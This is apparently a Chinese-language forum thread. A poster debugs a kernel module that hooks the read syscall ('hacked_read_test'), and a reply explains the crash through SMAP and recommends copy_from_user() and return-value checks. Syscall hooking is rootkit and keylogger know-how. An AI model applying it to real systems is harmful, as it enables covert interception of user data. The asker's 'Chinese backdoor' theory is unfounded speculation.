第一个问题是模块卸载时出错：几个进程仍在不断调用 hacked_read_test 函数，而模块已经卸载，所以它们会因为 can not access to this part of memory 这个错误而崩溃。第二个问题是所有 sys_call 都换成了新的包装器（也就是所谓的 "kernel code evolution/mutation"），于是参数改为通过 regs 传递。这两个问题我都已经解决了，所以新代码至少能在一部分机器上运行——大概是带有 "old" CPU 的那些。
我的问题是：为什么它在 i7-6700HQ 上会崩溃？原因可能是什么？难道是裸机硬件上带着一个 "XEN-like" 虚拟机的中国后门，不接受我的 asm 操作？还是别的什么？
查看日志文件可以看到:
BUG: unable to handle kernel paging request at 00007fffc3497560
此外,指令指针位于:
RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
最好的做法是反汇编函数并找到有问题的指令。
另外代码需要改进：
- 您需要检查返回值
- 您不应在内核模块里把数组放在栈上。内核空间的栈非常有限，必须在堆上分配。
if ( strlen( buf ) > 0 )
您调用 strlen() 时传入的参数：
- 不在内核地址空间
- 可能不指向以 null 结尾的字符串
- 可能根本不指向已映射的内存
这很可能也是两台机器表现不同的原因：日志里 Oops 的错误码是 0001（已映射页面上的保护违规，而不是缺页），而 CR4 的值 00000000003606e0 中 SMAP 位（bit 21）已置位——Skylake 的 i7-6700HQ 支持 SMAP，会阻止内核代码直接访问用户空间地址；Sandy Bridge 的 i5-2500K 没有这项保护，所以同样的错误在那台机器上只是碰巧没有暴露出来。
不要那样做。请用 read() 的返回值来确定实际读取了多少数据，并用 copy_from_user() 从用户指针复制数据。